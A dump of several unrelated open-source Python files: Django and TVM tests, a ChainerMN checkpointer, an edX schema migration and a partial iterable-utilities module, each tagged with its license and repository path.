from django.core.management.color import no_style from django.core.management.sql import custom_sql_for_model from django.db import connections, DEFAULT_DB_ALIAS from django.test import TestCase from django.test.utils import override_settings from .models import Simple class InitialSQLTests(TestCase): """ The format of the included SQL file for this test suite is important. It must end with a trailing newline in order to test the fix for #2161. """ def test_initial_sql(self): """ As pointed out by #14661, test data loaded by custom SQL can't be relied upon; as a result, the test framework flushes the data contents before every test. This test validates that this has occurred. """ self.assertEqual(Simple.objects.count(), 0) def test_custom_sql(self): """ Simulate the custom SQL loading by syncdb. """ connection = connections[DEFAULT_DB_ALIAS] custom_sql = custom_sql_for_model(Simple, no_style(), connection) self.assertEqual(len(custom_sql), 9) cursor = connection.cursor() for sql in custom_sql: cursor.execute(sql) self.assertEqual(Simple.objects.count(), 9) self.assertEqual( Simple.objects.get(name__contains='placeholders').name, '"100%" of % are not placeholders' ) @override_settings(DEBUG=True) def test_custom_sql_debug(self): """ Same test, ensure that CursorDebugWrapper doesn't alter sql loading (#3485). """ self.test_custom_sql()
apache-2.0
dmlc/tvm
tests/python/topi/python/test_topi_space_to_batch_nd.py
2
2735
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """Test code for space to batch""" import numpy as np import tvm from tvm import te from tvm import topi import tvm.testing import tvm.topi.testing def verify_space_to_batch_nd(input_shape, block_shape, pad_before, pad_after, pad_value=0): out_shape = [] out_shape.append(int((input_shape[0] * np.prod(block_shape)))) for i in range(1, len(block_shape) + 1): pad = pad_before[i - 1] + pad_after[i - 1] out_shape.append(int((input_shape[i] + pad) // block_shape[i - 1])) for i in range(len(block_shape) + 1, len(input_shape)): out_shape.append(input_shape[i]) A = te.placeholder(input_shape, name="A", dtype="float32") dtype = A.dtype a_np = np.random.uniform(size=input_shape).astype(dtype) B = topi.nn.space_to_batch_nd(A, block_shape, pad_before, pad_after, pad_value) b_np = tvm.topi.testing.space_to_batch_nd_python( a_np, block_shape, pad_before, pad_after, pad_value ) def check_device(device, ctx): print("Running on target: %s" % device) with tvm.target.create(device): s = tvm.topi.testing.get_injective_schedule(device)(B) a = tvm.nd.array(a_np, ctx) b = tvm.nd.array(np.zeros(out_shape, dtype=dtype), ctx) f = tvm.build(s, [A, B], device) f(a, b) tvm.testing.assert_allclose(b.asnumpy(), b_np, rtol=1e-3, 
atol=1e-3) for device, ctx in tvm.testing.enabled_targets(): check_device(device, ctx) @tvm.testing.uses_gpu def test_space_to_batch(): # Without paddings verify_space_to_batch_nd([3, 3, 2, 1], [3], [0], [0]) # With paddings verify_space_to_batch_nd([3, 3, 2, 1], [3], [1], [2]) # Multiple spatial dims verify_space_to_batch_nd([3, 3, 4, 5, 2], [3, 4, 2], [1, 0, 3], [2, 0, 0]) # No remaining dims verify_space_to_batch_nd([3, 3, 4, 5, 2], [3, 4, 2, 2], [1, 4, 0, 0], [2, 0, 1, 0]) if __name__ == "__main__": test_space_to_batch()
apache-2.0
jnishi/chainer
chainermn/extensions/checkpoint.py
3
11305
import errno import os import shutil import tempfile import time import chainer from chainer.training import extension from chainer.utils import experimental def create_multi_node_checkpointer(name, comm, cp_interval=5, gc_interval=5, path=None): '''Create multi-node checkpointer object Generational snapshot extension to allow fault tolerance; It keeps several old snapshots to rollback synchronized snapshot at each MPI process. Snapshot files are identified as '<name>.<rank>.<iteration>'. - <name> ... identifier of the run where snapshot is kept for - <rank> ... which process owned the model - <iteration> ... number of iteration. This extension keeps several files for each execution and allows users to resume the whole job at the latest snapshots of each MPI process, and the iteration where all snapshots agrees. As this object is a usual Chainer extension, users can just create this object and pass to the trainer as an extension:: checkpointer = create_multi_node_checkpointer(name=run_id, comm=comm) trainer.extend(checkpointer, trigger=(25, 'iteration')) To run recovery at startup, before first iteration, run checkpointer.maybe_load(trainer, optimizer) before ``trainer.run()`` . If nothing is recovered (i.e. no snapshot found), ``trainer.updater.iteration`` will remain ``0`` . Otherwise it will have the value of snapshot and the training will resume from that iteration. ``optimizer`` is optional but this will let multi node optimizer avoid initial broadcast when all snapshot data among nodes are all in sync. .. note:: Make sure that ``checkpointer.maybe_load`` is called *after* all extensions with states, such as ``ExponentialShift``, set to the trainer. After training finished without errors all those temporary checkpoints will be cleaned up at all nodes. 
Another example to use checkpointer *without* trainer would be:: checkpointer = create_multi_node_checkpointer(name=run_id, comm=comm) checkpointer.maybe_load(obj_you_want_to_snap, optimizer) while True: ## Training loop ... updater.update() ... checkpointer.save(obj_you_want_to_snap) # Make a checkpoint Args: name (str): unique id of the run comm: communicater in ChainerMN cp_interval (int): minimum number of checkpoints to preserve gc_interval (int): interval to collect non-preserved checkpoints ''' experimental('chainermn.extensions.create_multi_node_checkpointer') return _MultiNodeCheckpointer(name, comm, cp_interval, gc_interval, path) class _CheckpointStats(object): def __init__(self): self.timings = [] self.begin = None def start(self): self.begin = time.time() def end(self): e = time.time() if self.begin is None: return self.timings.append({'b': self.begin, 'd': e - self.begin}) self.begin = None def report(self): count = len(self.timings) if count == 0: return 'No stats available' durations = [t['d'] for t in self.timings] average = sum(durations) / count fmt_str = "Snapshot duration stats (sec): avg={:f}, min={:f}, max={:f}" return fmt_str.format(average, min(durations), max(durations)) class _MultiNodeCheckpointer(extension.Extension): def __init__(self, name, comm, cp_interval, gc_interval, path): self.name = name self.cp_interval = cp_interval self.gc_interval = gc_interval self.comm = comm self.files = [] self.stats = _CheckpointStats() # TODO(kuenishi): support path expression such as # 'path/{rank}/snapshot' or 'path/{host}/snapshot' if path is not None: self.path = path _maybe_makedirs(self.path) else: self.path = None assert name is not None assert self.cp_interval > 0 assert self.gc_interval > 0 assert self.comm is not None def __call__(self, trainer): # This is supposed to be called at the exact same interval # among all nodes if self.path is None: # Note: In a non-trainer use case this path will fail; You # shouldn't pass None at __init__(). 
self.path = trainer.out self.save(trainer, trainer.updater.iteration) def save(self, target, iteration): '''Take snapshots of a target (mostly trainer) at each node This must be called at all nodes synchronously at the same timing of same iteration. ''' # TODO(kuenishi): Possibly taking checksum on snapshot file # may help model loading more reliable ... snapshot_object is # smart that uses temporary files and then moving the file, # which prevents partial write by atomic operation. If we # assume external hands such as bit rot or file truncate we # need this. In current implementation manual removal of # latest snapshot files will let recovery happen against # next-latest snapshot. filename = self._filename(iteration) self.stats.start() _save(self.path, filename, target) self.stats.end() self.files.append(filename) if len(self.files) - self.cp_interval > 5: # remove older snapshots, and broadcast latest list self._sync_file_list(remove_remainder=True) def finalize(self): '''Finalize checkpointer Clean up all intermediate snapshots. ''' assert self.path is not None files2remove = self.files for file in files2remove: filename = os.path.join(self.path, file) try: os.remove(filename) except Exception: pass self.files = [] def get_stats(self): '''Get statistics of taking snapshots After or during training, checkpointer holds statistics on saving checkpoints such as average time, minimum and maximum time. With this stats users may identify slow nodes or disk, or know average time penalty of taking snapshot and optmize interval to take snapshots. 
''' return self.stats.report() def _sync_file_list(self, remove_remainder=False): file_lists = self.comm.gather_obj(self.files) iters0 = None if self.comm.rank == 0: if file_lists is not None: if len(file_lists) == 0: self.files = [] return iters0 = set( [i for _, _, i in self._parse_filenames(file_lists[0])]) for files in file_lists[1:]: iters = set( [i for _, _, i in self._parse_filenames(files)]) iters0 &= iters iters0 = list(iters0) iters0.sort() iters0 = iters0[-self.cp_interval:] else: raise RuntimeError("Can't gather checkpoint file names") iters0 = self.comm.bcast_obj(iters0) files = self._filenames(iters0) if remove_remainder: files2remove = set(self.files) - set(files) for file in files2remove: try: os.remove(os.path.join(self.path, file)) except Exception: pass self.files = files def _filenames(self, iterations): return [self._filename(i) for i in iterations] def _filename(self, iteration): # TODO(kuenishi): As a node identifier, should we use node # name (e.g. hostname) or MPI rank? # # hostname is fine when MPI rank changes among same set of nodes. # MPI rank is fine when node fails and a new node has come. filename = '{:s}.{:d}.{:d}'.format( self.name, self.comm.rank, iteration) return filename def _parse_filenames(self, filenames): # extract filenames and return [ <iteration> ] return [self._parse_filename(f) for f in filenames] def _parse_filename(self, filename): tpl = filename.split('.') if len(tpl) != 3: return name, rank, iter = tpl if name != self.name: return return name, int(rank), int(iter) def maybe_load(self, trainer, optimizer=None, path=None): '''If there's existing model, load, sync, and resume. 
''' if self.path is None: if path is not None: self.path = path else: self.path = trainer.out local_files = [] try: local_files = os.listdir(self.path) except Exception: # Maybe I am the only process that does not have result # directory pass local_iters = filter(None, self._parse_filenames(local_files)) local_iters = [i for name, rank, i in local_iters if name == self.name and rank == self.comm.rank] self.files = self._filenames(local_iters) # Collect common file list self._sync_file_list() # Get set of common snapshot numbers (=iteration number) iters = [i for name, rank, i in self._parse_filenames(self.files)] if len(iters) > 0: # Adopt latest snapshot from iteration number i = max(iters) # Note that checkpointer only verifies file name - if # exception happens here, currently manual deletion of # *latest* snapshot may checkpointer work sanely against # one older snapshot _load(self.path, self._filename(i), trainer) if optimizer is not None: # If this is a complete resume, no broadcast is needed ^^; # 'complete resume' means all workers' snapshot is preserved, # so all workers can assume their loaded model is complete. # Otherwise _MultiNodeOptimizer broadcasts and shares data # from rank 0. optimizer.__setattr__('needs_broadcast', False) def _load(path, filename, target): chainer.serializers.load_npz(os.path.join(path, filename), target) def _save(path, filename, target): # Simple save_npz may cause partial write - instead copied and # modified a bit from chainer.extensions.snapshot. 
_maybe_makedirs(path) prefix = 'tmp-' + filename fd, tmppath = tempfile.mkstemp(prefix=prefix, dir=path) try: chainer.serializers.save_npz(tmppath, target) except Exception: os.close(fd) os.remove(tmppath) raise os.close(fd) shutil.move(tmppath, os.path.join(path, filename)) def _maybe_makedirs(path): # This is for Python 2-3 compatibility; # os.makedirs(path, exist_ok=True) would be more simpler try: os.makedirs(path) except OSError as exc: if exc.errno == errno.EEXIST and os.path.isdir(path): pass else: raise
mit
jelugbo/hebs_master
common/djangoapps/student/migrations/0029_add_lookup_table_between_user_and_anonymous_student_id.py
58
16365
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding model 'AnonymousUserId' db.create_table('student_anonymoususerid', ( ('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)), ('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])), ('anonymous_user_id', self.gf('django.db.models.fields.CharField')(unique=True, max_length=16)), ('course_id', self.gf('django.db.models.fields.CharField')(max_length=255, db_index=True)), )) db.send_create_signal('student', ['AnonymousUserId']) def backwards(self, orm): # Deleting model 'AnonymousUserId' db.delete_table('student_anonymoususerid') models = { 'auth.group': { 'Meta': {'object_name': 'Group'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}), 'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}) }, 'auth.permission': { 'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'}, 'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) }, 'auth.user': { 'Meta': {'object_name': 'User'}, 'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 
'blank': 'True'}), 'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}), 'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}), 'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}) }, 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, 'student.anonymoususerid': { 'Meta': {'object_name': 'AnonymousUserId'}, 'anonymous_user_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '16'}), 'course_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}) }, 'student.courseenrollment': { 'Meta': {'ordering': "('user', 'course_id')", 
'unique_together': "(('user', 'course_id'),)", 'object_name': 'CourseEnrollment'}, 'course_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}), 'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'mode': ('django.db.models.fields.CharField', [], {'default': "'honor'", 'max_length': '100'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}) }, 'student.courseenrollmentallowed': { 'Meta': {'unique_together': "(('email', 'course_id'),)", 'object_name': 'CourseEnrollmentAllowed'}, 'auto_enroll': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'course_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}), 'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'db_index': 'True', 'blank': 'True'}), 'email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}) }, 'student.pendingemailchange': { 'Meta': {'object_name': 'PendingEmailChange'}, 'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'new_email': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}), 'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}) }, 'student.pendingnamechange': { 'Meta': {'object_name': 'PendingNameChange'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'new_name': ('django.db.models.fields.CharField', [], 
{'max_length': '255', 'blank': 'True'}), 'rationale': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}), 'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'}) }, 'student.registration': { 'Meta': {'object_name': 'Registration', 'db_table': "'auth_registration'"}, 'activation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '32', 'db_index': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'unique': 'True'}) }, 'student.testcenterregistration': { 'Meta': {'object_name': 'TestCenterRegistration'}, 'accommodation_code': ('django.db.models.fields.CharField', [], {'max_length': '64', 'blank': 'True'}), 'accommodation_request': ('django.db.models.fields.CharField', [], {'max_length': '1024', 'blank': 'True'}), 'authorization_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'db_index': 'True'}), 'client_authorization_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '20', 'db_index': 'True'}), 'confirmed_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}), 'course_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}), 'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}), 'eligibility_appointment_date_first': ('django.db.models.fields.DateField', [], {'db_index': 'True'}), 'eligibility_appointment_date_last': ('django.db.models.fields.DateField', [], {'db_index': 'True'}), 'exam_series_code': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'processed_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}), 
'testcenter_user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['student.TestCenterUser']"}), 'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}), 'upload_error_message': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}), 'upload_status': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '20', 'blank': 'True'}), 'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}), 'user_updated_at': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}) }, 'student.testcenteruser': { 'Meta': {'object_name': 'TestCenterUser'}, 'address_1': ('django.db.models.fields.CharField', [], {'max_length': '40'}), 'address_2': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'}), 'address_3': ('django.db.models.fields.CharField', [], {'max_length': '40', 'blank': 'True'}), 'candidate_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'db_index': 'True'}), 'city': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}), 'client_candidate_id': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50', 'db_index': 'True'}), 'company_name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '50', 'blank': 'True'}), 'confirmed_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}), 'country': ('django.db.models.fields.CharField', [], {'max_length': '3', 'db_index': 'True'}), 'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'db_index': 'True', 'blank': 'True'}), 'extension': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '8', 'blank': 'True'}), 'fax': ('django.db.models.fields.CharField', [], {'max_length': '35', 'blank': 'True'}), 'fax_country_code': 
('django.db.models.fields.CharField', [], {'max_length': '3', 'blank': 'True'}), 'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'db_index': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'last_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}), 'middle_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}), 'phone': ('django.db.models.fields.CharField', [], {'max_length': '35'}), 'phone_country_code': ('django.db.models.fields.CharField', [], {'max_length': '3', 'db_index': 'True'}), 'postal_code': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '16', 'blank': 'True'}), 'processed_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'db_index': 'True'}), 'salutation': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}), 'state': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '20', 'blank': 'True'}), 'suffix': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}), 'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'db_index': 'True', 'blank': 'True'}), 'upload_error_message': ('django.db.models.fields.CharField', [], {'max_length': '512', 'blank': 'True'}), 'upload_status': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '20', 'blank': 'True'}), 'uploaded_at': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['auth.User']", 'unique': 'True'}), 'user_updated_at': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True'}) }, 'student.userprofile': { 'Meta': {'object_name': 'UserProfile', 'db_table': "'auth_userprofile'"}, 'allow_certificate': ('django.db.models.fields.BooleanField', [], 
{'default': 'True'}), 'courseware': ('django.db.models.fields.CharField', [], {'default': "'course.xml'", 'max_length': '255', 'blank': 'True'}), 'gender': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '6', 'null': 'True', 'blank': 'True'}), 'goals': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'language': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}), 'level_of_education': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '6', 'null': 'True', 'blank': 'True'}), 'location': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}), 'mailing_address': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}), 'meta': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}), 'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'profile'", 'unique': 'True', 'to': "orm['auth.User']"}), 'year_of_birth': ('django.db.models.fields.IntegerField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}) }, 'student.userstanding': { 'Meta': {'object_name': 'UserStanding'}, 'account_status': ('django.db.models.fields.CharField', [], {'max_length': '31', 'blank': 'True'}), 'changed_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'standing_last_changed_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}), 'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'standing'", 'unique': 'True', 'to': "orm['auth.User']"}) }, 'student.usertestgroup': { 'Meta': {'object_name': 
'UserTestGroup'}, 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}), 'users': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.User']", 'db_index': 'True', 'symmetrical': 'False'}) } } complete_apps = ['student']
agpl-3.0
MacHu-GWU/angora-project
angora/algorithm/iterable.py
1
19421
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Module description ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This module offer high performance and memory efficient looping toolset. Usually we process elements one at a time rather than bringing the whole iterable into memory all at once. - :func:`take`: Return first n items of the iterable as a list. - :func:`flatten`: Flatten one layer of nesting. - :func:`flatten_all`: Flatten arbitrary depth of nesting. Good for unknown nesting structure iterable object. - :func:`nth`: Returns the nth item or a default value. - :func:`shuffled`: Returns the shuffled iterable. - :func:`grouper`: Collect data into fixed-length chunks or blocks. - :func:`grouper_list`: Evenly divide LIST into fixed-length piece, no filled value if chunk size smaller than fixed-length. - :func:`grouper_dict`: Evenly divide DICTIONARY into fixed-length piece, no filled value if chunk size smaller than fixed-length. - :func:`running_windows`: Generate n-size running windows. - :func:`cycle_running_windows`: Generate n-size cycle running windows. - :func:`cycle_slice`: Given a list, return right hand cycle direction slice from start to end. - :func:`cycle_dist`: Find distance between x, y by means of a n-length cycle. - :func:`shift_to_the_left`: Shift array to the left. - :func:`shift_to_the_right`: Shift array to the right. - :func:`count_generator`: Count number of item in generator. 
Compatibility ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - Python2: Yes - Python3: Yes Prerequisites ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - None Class, method, function, exception ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ """ from __future__ import print_function import collections import itertools import random import sys is_py2 = (sys.version_info[0] == 2) if is_py2: from itertools import ifilterfalse as filterfalse, izip_longest as zip_longest else: # in python3 from itertools import filterfalse, zip_longest def take(n, iterable): """Return first n items of the iterable as a list. Usage:: >>> take([0, 1, 2], 2) [0, 1] """ return list(itertools.islice(iterable, n)) def flatten(list_of_list): """Flatten one layer of nesting. Usage:: >>> flatten([[0, 1], [2, 3]] [0, 1, 2, 3] """ return itertools.chain.from_iterable(list_of_list) def flatten_all(list_of_list): """Flatten arbitrary depth of nesting. Good for unknown nesting structure iterable object. Usage:: >>> flatten_all([[0, 1], [2, 3, [4, 5], [6, 7, 8]], [9,]]) [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] """ for i in list_of_list: if hasattr(i, "__iter__"): for j in flatten_all(i): yield j else: yield i def nth(iterable, n, default=None): """Returns the nth item or a default value. Usage:: >>> nth([0, 1, 2], 1) 1 >>> nth([0, 1, 2], 100) None """ return next(itertools.islice(iterable, n, None), default) def shuffled(iterable): """Returns the shuffled iterable. Usage:: >>> shuffled([0, 1, 2] [2, 0, 1] """ return random.sample(iterable, len(iterable)) def grouper(iterable, n, fillvalue=None): """Collect data into fixed-length chunks or blocks. 
Usage:: >>> list(grouper(range(10), n=3, fillvalue=1024)) [(0, 1, 2), (3, 4, 5), (6, 7, 8), (9, 1024, 1024)] """ # grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx args = [iter(iterable)] * n return zip_longest(fillvalue=fillvalue, *args) def grouper_list(l, n): """Evenly divide list into fixed-length piece, no filled value if chunk size smaller than fixed-length. Usage:: >>> list(grouper(range(10), n=3) [[0, 1, 2], [3, 4, 5], [6, 7, 8], [9]] **中文文档** 目前为止, 一共有3种实现方法。其中第三种方法对于不同的N, 效率都是最高。 1最差, 2其次。 - 方法1: 调用grouper()函数, 然后对里面的None元素进行清理。 - 方法2: 建立一个list, 每次添加一个元素, 并检查len()。 - 方法3: 建立一个counter, 随着每个group的元素数量增加, 并与size比较。 """ chunk = list() counter = 0 for item in l: counter += 1 chunk.append(item) if counter == n: yield chunk chunk = list() counter = 0 if len(chunk) > 0: yield chunk def grouper_dict(d, n): """Evenly divide dictionary into fixed-length piece, no filled value if chunk size smaller than fixed-length. Usage:: >>> list(grouper_dict({1: 'A', 2: 'B', 3: 'C', 4: 'D', 5: 'E', 6: 'F', 7: 'G', 8: 'H', 9: 'I', 10: 'J'})) [{1: 'A', 2: 'B', 3: 'C'}, {4: 'D', 5: 'E', 6: 'F'}, {7: 'G', 8: 'H', 9: 'I'}, {10: 'J'}] """ chunk = dict() counter = 0 for k, v in d.items(): counter += 1 chunk[k] = v print(counter ,chunk) if counter == n: yield chunk chunk = dict() counter = 0 if len(chunk) > 0: yield chunk def running_windows(iterable, size): """Generate n-size running windows. Usage:: >>> for i in running_windows([1, 2, 3, 4, 5], size=3): ... print(i) [1, 2, 3] [2, 3, 4] [3, 4, 5] """ fifo = collections.deque(maxlen=size) for i in iterable: fifo.append(i) if len(fifo) == size: yield list(fifo) def cycle_running_windows(iterable, size): """Generate n-size cycle running windows. Usage:: >>> for i in running_windows([1, 2, 3, 4, 5], size=3): ... 
print(i) [1, 2, 3] [2, 3, 4] [3, 4, 5] [4, 5, 1] [5, 1, 2] """ fifo = collections.deque(maxlen=size) cycle = itertools.cycle(iterable) counter = itertools.count(1) length = len(iterable) for i in cycle: fifo.append(i) if len(fifo) == size: yield list(fifo) if next(counter) == length: break def cycle_slice(sliceable, start, end): """Given a list, return right hand cycle direction slice from start to end. Usage:: >>> array = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] >>> cycle_slice(array, 4, 7) # from array[4] to array[7] [4, 5, 6, 7] >>> cycle_slice(array, 8, 2) # from array[8] to array[2] [8, 9, 0, 1, 2] """ if type(sliceable) != list: sliceable = list(sliceable) if end >= start: return sliceable[start:end+1] else: return sliceable[start:] + sliceable[:end+1] def cycle_dist(x, y, n): """Find Distance between x, y by means of a n-length cycle. Example: cycle_dist(1, 23, 24) = 2 cycle_dist(5, 13, 24) = 8 cycle_dist(0.0, 2.4, 1.0) = 0.4 cycle_dist(0.0, 2.6, 1.0) = 0.4 """ dist = abs(x - y) % n if dist >= 0.5 * n: dist = n - dist return dist def shift_to_the_left(array, dist, pad=True, trim=True): """Shift array to the left. :param array: An iterable object. :type array: iterable object :param dist: how far you want to shift :type disk: int :param pad: pad array[-1] to the right. :type pad: boolean (default True) :param trim: trim the first ``#dist`` items. :type trim: boolean (default True) Usage:: >>> array = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9] 